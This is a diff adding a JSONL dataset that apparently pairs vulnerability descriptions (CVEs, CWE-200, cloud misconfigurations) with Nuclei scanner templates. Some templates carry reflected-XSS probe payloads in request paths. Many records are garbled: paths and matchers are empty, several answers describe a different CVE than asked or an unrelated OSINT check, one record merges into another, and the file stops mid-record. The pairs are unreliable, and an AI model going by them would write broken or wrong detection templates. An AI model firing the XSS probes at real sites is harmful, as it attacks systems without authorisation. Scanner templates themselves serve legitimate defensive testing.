diff --git "a/test.jsonl" "b/test.jsonl" new file mode 100644--- /dev/null +++ "b/test.jsonl" @@ -0,0 +1,1675 @@ +{"instruction": "Generate a Nuclei template for CVE-2022-35493", "input": "Title: Cross-Site Scripting (XSS) in wrteam eshop_-_ecommerce_\\/_store_website\nSummary: A Cross-site scripting (XSS) vulnerability in json search parse and the json response in wrteam.in, eShop - Multipurpose Ecommerce Store Website version 3.0.4 allows remote attackers to inject arbitrary web script or HTML via the get_products?search parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: wrteam eshop_-_ecommerce_\\/_store_website\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-35493\n\ninfo:\n name: eShop 3.0.4 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in.\n tags: cve,cve2022,eshop,xss,wrteam,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E\" \n matchers:\n - type: word\n words:\n - \"Search Result for \\\">\" \n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-35493"} +{"instruction": "Generate a Nuclei template for CVE-2022-4325", "input": "Title: Unknown Vulnerability in ifeelweb post_status_notifier_lite\nSummary: The Post Status Notifier Lite WordPress plugin before 1.10.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which can be used against high privilege users such as admin.\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: ifeelweb post_status_notifier_lite\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-4325\n\ninfo:\n name: WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n tags: cve,cve2022,wp,wordpress,wpscan,authenticated,xss,wp-plugin,post-status-notifier-lite,ifeelweb,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2022-4325"} +{"instruction": "Generate a Nuclei template for: PostgreSQL \"log_disconnections\" Parameter - Disabled", "input": "Title: PostgreSQL \"log_disconnections\" Parameter - Disabled\nSummary: PostgreSQL \"log_disconnections\" Parameter - Disabled. The log_disconnections parameter in Alibaba Cloud RDS for PostgreSQL is disabled, meaning the database does not log session disconnections. This can hinder the ability to audit and analyze database connection activities effectively.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: log-disconnections-disabled\n\ninfo:\n name: PostgreSQL \"log_disconnections\" Parameter - Disabled\n author: DhiyaneshDK\n severity: medium\n description: The log_disconnections parameter in Alibaba Cloud RDS for PostgreSQL is disabled, meaning the database does not log session disconnections. This can hinder the ability to audit and analyze database connection activities effectively.\n tags: cloud,devops,aliyun,alibaba,alibaba-cloud-config,alibaba-rds\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "log-disconnections-disabled"} +{"instruction": "Generate a Nuclei template for: Optimizely API Test", "input": "Title: Optimizely API Test\nSummary: Optimizely API Test. Tags: token-spray, optimizely\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-optimizely\n\ninfo:\n name: Optimizely API Test\n author: dwisiswant0\n severity: info\n description: Optimizely API Test\n tags: token-spray,optimizely\n\nhttp:\n - method: GET\n path:\n - \"https://api.optimizely.com/v2/projects\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"\"account_id\":\" \n - \"\"confidence_threshold\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-optimizely"} +{"instruction": "Generate a Nuclei template for CVE-2022-25497", "input": "Title: Vulnerability (CWE-552) in cuppacms cuppacms\nSummary: CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.\nVulnerability Type: Vulnerability (CWE-552)\nSeverity: medium\nAffected Products: cuppacms cuppacms\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-25497\n\ninfo:\n name: Cuppa CMS v1.0 - Local File Inclusion\n author: theamanrawat\n severity: medium\n description: CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.\n tags: cve,cve2022,lfi,cuppa,intrusive,cuppacms,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"text/plain\" \n part: header_2\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-25497"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: teknik\n\ninfo:\n name: Teknik User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Teknik user name information check was conducted.\n tags: osint,osint-tech,teknik,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://user.teknik.io/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Public Key\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2015-8349", "input": "Title: Cross-Site Scripting (XSS) in gameconnect sourcebans\nSummary: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: gameconnect sourcebans\nIndicators: error, vulnerability detected", "output": "id: CVE-2015-8349\n\ninfo:\n name: SourceBans <2.0 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.\n tags: cve2015,cve,xss,sourcebans,gameconnect,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2015-8349"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - DigitalOcean Anchor", "input": "Title: Content-Security-Policy Bypass - DigitalOcean Anchor\nSummary: Content-Security-Policy Bypass - DigitalOcean Anchor\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: digitalocean-anchor-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - DigitalOcean Anchor\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - DigitalOcean Anchor\n tags: xss,csp-bypass,digitalocean-anchor,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"digitalocean.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "digitalocean-anchor-csp-bypass"} +{"instruction": "Generate a Nuclei template for CVE-2021-45811", "input": "Title: SQL Injection in enhancesoft osticket\nSummary: A SQL injection vulnerability in the \"Search\" functionality of \"tickets.php\" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the \"keywords\" and \"topic_id\" URL parameters combination.\nVulnerability Type: SQL Injection\nSeverity: medium\nAffected Products: enhancesoft osticket\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-45811\n\ninfo:\n name: osTicket 1.15.x - SQL Injection\n author: ritikchaddha\n severity: medium\n description: A SQL injection vulnerability in the \"Search\" functionality of \"tickets.php\" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the \"keywords\" and \"topic_id\" URL parameters combination.\n tags: cve,cve2021,osticket,sqli,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n - method: GET\n path:\n matchers:\n - type: dsl", "category": "cve", "severity": "medium", "id": "CVE-2021-45811"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: mastodon-mstdnio\n\ninfo:\n name: Mastodon-mstdn.io User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Mastodon-mstdn.io user name information check was conducted.\n tags: osint,osint-social,mastodon-mstdnio,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://mstdn.io/@{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"@mstdn.io) - Mastodon\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2024-46310", "input": "Title: Vulnerability (CWE-281) in CVE-2024-46310\nSummary: Incorrect Access Control in Cfx.re FXServer v9601 and earlier allows unauthenticated users to modify and read arbitrary user data via exposed API endpoint\nVulnerability Type: Vulnerability (CWE-281)\nSeverity: critical\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-46310\n\ninfo:\n name: FXServer < v9601 - Information Exposure\n author: s4e-io\n severity: medium\n description: Incorrect Access Control in FXServer version's v9601 and prior, for CFX.re FiveM, allows unauthenticated users to modify and read userdata via exposed api endpoint.\n tags: cve,cve2024,fxserver,info-leak,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-46310"} +{"instruction": "Generate a Nuclei template for: Invoice Ninja Setup Page - Exposure", "input": "Title: Invoice Ninja Setup Page - Exposure\nSummary: Invoice Ninja Setup Page - Exposure. Detects exposed Invoice Ninja Setup page.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: invoice-ninja-installer\n\ninfo:\n name: Invoice Ninja Setup Page - Exposure\n author: DhiyaneshDK\n severity: high\n description: Detects exposed Invoice Ninja Setup page.\n tags: misconfig,install,exposure,invoice,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/setup\" \n matchers:\n - type: word\n words:\n - \"Invoice Ninja Setup\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "invoice-ninja-installer"} +{"instruction": "Generate a Nuclei template for: Weaver OA XmlRpcServlet - Arbitary File Read", "input": "Title: Weaver OA XmlRpcServlet - Arbitary File Read\nSummary: Weaver OA XmlRpcServlet - Arbitary File Read. e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: CNVD-2022-43245\n\ninfo:\n name: Weaver OA XmlRpcServlet - Arbitary File Read\n author: SleepingBag945\n severity: high\n description: e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.\n tags: cnvd,cnvd2022,weaver,e-office,oa,lfi,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/xml\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "CNVD-2022-43245"} +{"instruction": "Generate a Nuclei template for CVE-2005-4385", "input": "Title: Unknown Vulnerability in cofax cofax\nSummary: Cross-site scripting (XSS) vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: cofax cofax\nIndicators: error, vulnerability detected", "output": "id: CVE-2005-4385\n\ninfo:\n name: Cofax <=2.0RC3 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.\n tags: cve2005,cve,cofax,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"'>\"\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2005-4385"} +{"instruction": "Generate a Nuclei template for: Seeyon OA A6 config.jsp - Information Disclosure", "input": "Title: Seeyon OA A6 config.jsp - Information Disclosure\nSummary: Seeyon OA A6 config.jsp - Information Disclosure. The Seeyon OA A6 config.jsp page can be accessed without authorization, resulting in sensitive information leakage vulnerabilities, through which attackers can obtain sensitive information in the server\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: seeyon-config-exposure\n\ninfo:\n name: Seeyon OA A6 config.jsp - Information Disclosure\n author: SleepingBag945\n severity: medium\n description: The Seeyon OA A6 config.jsp page can be accessed without authorization, resulting in sensitive information leakage vulnerabilities, through which attackers can obtain sensitive information in the server\n tags: seeyon,oa,config,info-leak,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"DatabaseName=\" \n - \"\u8bf7\u5728\u6587\u672c\u6846\u5185\u914d\u7f6e\u4f20\u771f\u63d2\u4ef6\u6240\u9700\u670d\u52a1\u5668\u7684\u4fe1\u606f\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "seeyon-config-exposure"} +{"instruction": "Generate a Nuclei template for CVE-2022-2633", "input": "Title: Vulnerability (CWE-610) in plugins360 all-in-one_video_gallery\nSummary: The All-in-One Video Gallery plugin for WordPress is vulnerable to arbitrary file downloads and blind server-side request forgery via the 'dl' parameter found in the ~/public/video.php file in versions up to, and including 2.6.0. This makes it possible for unauthenticated users to download sensitive files hosted on the affected server and forge requests to the server.\nVulnerability Type: Vulnerability (CWE-610)\nSeverity: high\nAffected Products: plugins360 all-in-one_video_gallery\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-2633\n\ninfo:\n name: All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery\n author: theamanrawat\n severity: high\n description: WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the 'dl' parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server.\n tags: cve2022,cve,wp-plugin,unauth,ssrf,wpscan,wordpress,wp,all-in-one-video-gallery,plugins360,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Interactsh Server\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2022-2633"} +{"instruction": "Generate a Nuclei template for: Microsoft IIS version detect", "input": "Title: Microsoft IIS version detect\nSummary: Microsoft IIS version detect. Some Microsoft IIS servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: microsoft-iis-version\n\ninfo:\n name: Microsoft IIS version detect\n author: Wlayzz\n severity: info\n description: Some Microsoft IIS servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\n tags: tech,microsoft,iis,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"IIS\" \n part: header", "category": "generic", "severity": "info", "id": "microsoft-iis-version"} +{"instruction": "Generate a Nuclei template for CVE-2019-7256", "input": "Title: OS Command Injection in nortekcontrol linear_emerge_essential_firmware and others\nSummary: Linear eMerge E3-Series devices allow Command Injections.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: nortekcontrol linear_emerge_essential_firmware, nortekcontrol linear_emerge_elite_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-31499\n\ninfo:\n name: Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection\n author: pikpikcu\n severity: critical\n description: Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256.\n tags: time-based-sqli,cve,cve2022,packetstorm,emerge,rce,nortekcontrol,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2019-7256"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: mylittleadmin-panel\n\ninfo:\n name: myLittleAdmin Login Panel - Detect\n author: nullfuzz\n severity: info\n description: myLittleAdmin login panel was detected.\n tags: panel,mylittleadmin,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/mylittleadmin/\" \n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2020-36155", "input": "Title: Vulnerability (CWE-269) in ultimatemember ultimate_member\nSummary: An issue was discovered in the Ultimate Member plugin before 2.1.12 for WordPress, aka Unauthenticated Privilege Escalation via User Meta. An attacker could supply an array parameter for sensitive metadata, such as the wp_capabilities user meta that defines a user's role. During the registration process, submitted registration details were passed to the update_profile function, and any metadata was accepted, e.g., wp_capabilities[administrator] for Administrator access.\nVulnerability Type: Vulnerability (CWE-269)\nSeverity: critical\nAffected Products: ultimatemember ultimate_member\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-36155\n\ninfo:\n name: Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Meta\n author: riteshs4hu\n severity: critical\n description: An issue was discovered in the Ultimate Member plugin before 2.1.12 for WordPress, aka Unauthenticated Privilege Escalation via User Meta. An attacker could supply an array parameter for sensitive metadata, such as the wp_capabilities user meta that defines a user's role. During the registration process, submitted registration details were passed to the update_profile function, and any metadata was accepted, e.g., wp_capabilities[administrator] for Administrator access.\n tags: cve,cve2020,wordpress,wp-plugin,wp,wpscan,ultimate-member,intrusive,privesc,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2020-36155"} +{"instruction": "Generate a Nuclei template for: RDS Copy Tags to Snapshots - Disabled", "input": "Title: RDS Copy Tags to Snapshots - Disabled\nSummary: RDS Copy Tags to Snapshots - Disabled. Ensure that your Amazon RDS database instances make use of the Copy Tags to Snapshots feature in order to allow tags set on your database instances to be automatically copied to any automated or manual database snapshots that are created from these RDS instances.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: rds-copy-snap\n\ninfo:\n name: RDS Copy Tags to Snapshots - Disabled\n author: DhiyaneshDK\n severity: low\n description: Ensure that your Amazon RDS database instances make use of the Copy Tags to Snapshots feature in order to allow tags set on your database instances to be automatically copied to any automated or manual database snapshots that are created from these RDS instances.\n tags: cloud,devops,aws,amazon,rds,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "rds-copy-snap"} +{"instruction": "Generate a Nuclei template for: Formalms Exposed Installation", "input": "Title: Formalms Exposed Installation\nSummary: Formalms Exposed Installation. Formalms Installation is exposed.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: formalms-install\n\ninfo:\n name: Formalms Exposed Installation\n author: princechaddha\n severity: high\n description: Formalms Installation is exposed.\n tags: misconfig,formalms,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/install/\" \n matchers:\n - type: word\n words:\n - \"forma.lms installer\" \n - \"

forma.lms - Installation

\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "formalms-install"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: umbraco-login\n\ninfo:\n name: Umbraco Login Panel - Detect\n author: ola456,stvnhrlnd\n severity: info\n description: Umbraco login panel was detected.\n tags: panel,umbraco,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/umbraco\" \n - \"{{BaseURL}}/umbraco/login\" \n matchers:\n - type: word\n words:\n - \"Umbraco.Sys\" \n - \"Bugzilla Main\" \n - \"title=\"Bugzilla\" \n - \"href=\"https://bugzilla.readthedocs.org/\" \n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "bugzilla-detect"} +{"instruction": "Generate a Nuclei template for: YzmCMS - Installer", "input": "Title: YzmCMS - Installer\nSummary: YzmCMS - Installer. YzmCMS is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: yzmcms-installer\n\ninfo:\n name: YzmCMS - Installer\n author: ritikchaddha\n severity: high\n description: YzmCMS is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,yzmcms,install,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/application/install/index.php\" \n matchers:\n - type: word\n words:\n - \"\u5b89\u88c5\u7a0b\u5e8f - YzmCMS\" \n - \"YzmCMS\" \n part: body\n condition: or\n - type: word\n words:\n - \"/index.php?step=2\" \n - \"/install.css\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "yzmcms-installer"} +{"instruction": "Generate a Nuclei template for: gawk - Privilege Escalation", "input": "Title: gawk - Privilege Escalation\nSummary: gawk - Privilege Escalation. gawk is the GNU implementation of the AWK programming language. It is a powerful text processing tool that allows for pattern scanning and processing of text files. gawk is commonly used for data extraction, reporting, and manipulation tasks in shell scripts and command-line environments.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: privesc-gawk\n\ninfo:\n name: gawk - Privilege Escalation\n author: daffainfo\n severity: high\n description: gawk is the GNU implementation of the AWK programming language. It is a powerful text processing tool that allows for pattern scanning and processing of text files. gawk is commonly used for data extraction, reporting, and manipulation tasks in shell scripts and command-line environments.\n tags: code,linux,gawk,privesc,local\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "privesc-gawk"} +{"instruction": "Generate a Nuclei template for CVE-2021-26855", "input": "Title: Vulnerability (CWE-918) in microsoft exchange_server\nSummary: Microsoft Exchange Server Remote Code Execution Vulnerability\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: critical\nAffected Products: microsoft exchange_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-33766\n\ninfo:\n name: Microsoft Exchange - Authentication Bypass\n author: daffainfo\n severity: high\n description: Microsoft Exchange Server Information Disclosure Vulnerability. This vulnerability enables an attacker to bypass authentication and gain access to the Exchange Server's internal.\n tags: cve,cve2021,microsoft,exchange,auth-bypass,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"403\" \n - \"function signOut() {\" \n part: body\n condition: and\n - type: word\n words:\n - \"Microsoft.Exchange.Data.Storage.ObjectNotFoundException\" \n - \"X-BEResource=\" \n part: header\n condition: and\n - type: status\n status:\n - 403", "category": "cve", "severity": "critical", "id": "CVE-2021-26855"} +{"instruction": "Generate a Nuclei template for: FineReport Security Checks", "input": "Title: FineReport Security Checks\nSummary: FineReport Security Checks. A simple workflow that runs all FineReport related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: finereport-workflow\n\ninfo:\n name: FineReport Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all FineReport related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "finereport-workflow"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: quitterpl\n\ninfo:\n name: Quitter.pl User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Quitter.pl user name information check was conducted.\n tags: osint,osint-social,quitterpl,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://quitter.pl/profile/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"@quitter.pl\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: EOS HTTP Browser", "input": "Title: EOS HTTP Browser\nSummary: EOS HTTP Browser. Tags: exposure, eos, httpbrowser\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: eos-http-browser\n\ninfo:\n name: EOS HTTP Browser\n author: DhiyaneshDk\n severity: medium\n description: EOS HTTP Browser\n tags: exposure,eos,httpbrowser,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/eos/\" \n matchers:\n - type: word\n words:\n - \"STAT TEST\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "eos-http-browser"} +{"instruction": "Generate a Nuclei template for: Dependency-Track Login - Panel", "input": "Title: Dependency-Track Login - Panel\nSummary: Dependency-Track Login - Panel. Dependency Track login panel was discovered.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: dependency-track-panel\n\ninfo:\n name: Dependency-Track Login - Panel\n author: Th3l0newolf\n severity: info\n description: Dependency Track login panel was discovered.\n tags: panel,login,dependency,track,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login?redirect=%2Fdashboard\" \n matchers:\n - type: word\n words:\n - \"Dependency-Track\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "dependency-track-panel"} +{"instruction": "Generate a Nuclei template for CVE-2022-47075", "input": "Title: Unknown Vulnerability in smartofficepayroll smartoffice\nSummary: An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.\nVulnerability Type: Unknown Vulnerability\nSeverity: high\nAffected Products: smartofficepayroll smartoffice\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-47075\n\ninfo:\n name: Smart Office Web 20.28 - Information Disclosure\n author: r3Y3r53\n severity: high\n description: An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.\n tags: cve,cve2022,packetstorm,smart-office,info,exposure,smartofficepayroll,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ExportReportingManager.aspx\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2022-47075"} +{"instruction": "Generate a Nuclei template for: SurveySparrow takeover detection", "input": "Title: SurveySparrow takeover detection\nSummary: SurveySparrow takeover detection. SurveySparrow takeover was detected.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: surveysparrow-takeover\n\ninfo:\n name: SurveySparrow takeover detection\n author: philippedelteil\n severity: high\n description: SurveySparrow takeover was detected.\n tags: takeover,surveysparrow,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: 